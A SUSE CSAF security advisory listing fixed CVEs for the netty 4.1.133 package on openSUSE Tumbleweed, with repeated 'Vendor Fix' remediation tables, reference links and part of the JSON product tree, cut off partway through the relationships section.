| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64 | — |
Vendor Fix
|
| URL | Category |
|---|---|
| https://www.suse.com/support/security/rating/ | external |
| https://ftp.suse.com/pub/projects/security/csaf/o… | self |
| https://www.suse.com/security/cve/CVE-2026-41417/ | self |
| https://www.suse.com/security/cve/CVE-2026-42578/ | self |
| https://www.suse.com/security/cve/CVE-2026-42579/ | self |
| https://www.suse.com/security/cve/CVE-2026-42580/ | self |
| https://www.suse.com/security/cve/CVE-2026-42581/ | self |
| https://www.suse.com/security/cve/CVE-2026-42582/ | self |
| https://www.suse.com/security/cve/CVE-2026-42583/ | self |
| https://www.suse.com/security/cve/CVE-2026-42584/ | self |
| https://www.suse.com/security/cve/CVE-2026-42585/ | self |
| https://www.suse.com/security/cve/CVE-2026-42586/ | self |
| https://www.suse.com/security/cve/CVE-2026-42587/ | self |
| https://www.suse.com/security/cve/CVE-2026-44248/ | self |
| https://www.suse.com/security/cve/CVE-2026-41417 | external |
| https://bugzilla.suse.com/1264350 | external |
| https://www.suse.com/security/cve/CVE-2026-42578 | external |
| https://bugzilla.suse.com/1265243 | external |
| https://www.suse.com/security/cve/CVE-2026-42579 | external |
| https://bugzilla.suse.com/1265272 | external |
| https://www.suse.com/security/cve/CVE-2026-42580 | external |
| https://bugzilla.suse.com/1265273 | external |
| https://www.suse.com/security/cve/CVE-2026-42581 | external |
| https://bugzilla.suse.com/1265277 | external |
| https://www.suse.com/security/cve/CVE-2026-42582 | external |
| https://bugzilla.suse.com/1265318 | external |
| https://www.suse.com/security/cve/CVE-2026-42583 | external |
| https://bugzilla.suse.com/1265279 | external |
| https://www.suse.com/security/cve/CVE-2026-42584 | external |
| https://bugzilla.suse.com/1265280 | external |
| https://www.suse.com/security/cve/CVE-2026-42585 | external |
| https://bugzilla.suse.com/1265291 | external |
| https://www.suse.com/security/cve/CVE-2026-42586 | external |
| https://bugzilla.suse.com/1265245 | external |
| https://www.suse.com/security/cve/CVE-2026-42587 | external |
| https://bugzilla.suse.com/1265246 | external |
| https://www.suse.com/security/cve/CVE-2026-44248 | external |
| https://bugzilla.suse.com/1265293 | external |
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "netty-4.1.133-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the netty-4.1.133-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10795",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10795-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-41417 page",
"url": "https://www.suse.com/security/cve/CVE-2026-41417/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42578 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42578/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42579 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42579/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42580 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42580/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42581 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42581/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42582 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42582/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42583 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42584 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42584/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42585 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42585/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42586 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42586/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-42587 page",
"url": "https://www.suse.com/security/cve/CVE-2026-42587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-44248 page",
"url": "https://www.suse.com/security/cve/CVE-2026-44248/"
}
],
"title": "netty-4.1.133-1.1 on GA media",
"tracking": {
"current_release_date": "2026-05-16T00:00:00Z",
"generator": {
"date": "2026-05-16T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10795-1",
"initial_release_date": "2026-05-16T00:00:00Z",
"revision_history": [
{
"date": "2026-05-16T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.aarch64",
"product": {
"name": "netty-4.1.133-1.1.aarch64",
"product_id": "netty-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.aarch64",
"product": {
"name": "netty-bom-4.1.133-1.1.aarch64",
"product_id": "netty-bom-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.aarch64",
"product_id": "netty-javadoc-4.1.133-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.aarch64",
"product": {
"name": "netty-parent-4.1.133-1.1.aarch64",
"product_id": "netty-parent-4.1.133-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-4.1.133-1.1.ppc64le",
"product_id": "netty-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-bom-4.1.133-1.1.ppc64le",
"product_id": "netty-bom-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le",
"product_id": "netty-javadoc-4.1.133-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product": {
"name": "netty-parent-4.1.133-1.1.ppc64le",
"product_id": "netty-parent-4.1.133-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.s390x",
"product": {
"name": "netty-4.1.133-1.1.s390x",
"product_id": "netty-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.s390x",
"product": {
"name": "netty-bom-4.1.133-1.1.s390x",
"product_id": "netty-bom-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product": {
"name": "netty-javadoc-4.1.133-1.1.s390x",
"product_id": "netty-javadoc-4.1.133-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.s390x",
"product": {
"name": "netty-parent-4.1.133-1.1.s390x",
"product_id": "netty-parent-4.1.133-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.133-1.1.x86_64",
"product": {
"name": "netty-4.1.133-1.1.x86_64",
"product_id": "netty-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.133-1.1.x86_64",
"product": {
"name": "netty-bom-4.1.133-1.1.x86_64",
"product_id": "netty-bom-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product": {
"name": "netty-javadoc-4.1.133-1.1.x86_64",
"product_id": "netty-javadoc-4.1.133-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.133-1.1.x86_64",
"product": {
"name": "netty-parent-4.1.133-1.1.x86_64",
"product_id": "netty-parent-4.1.133-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64"
},
"product_reference": "netty-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.s390x"
},
"product_reference": "netty-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64"
},
"product_reference": "netty-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64"
},
"product_reference": "netty-bom-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-bom-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
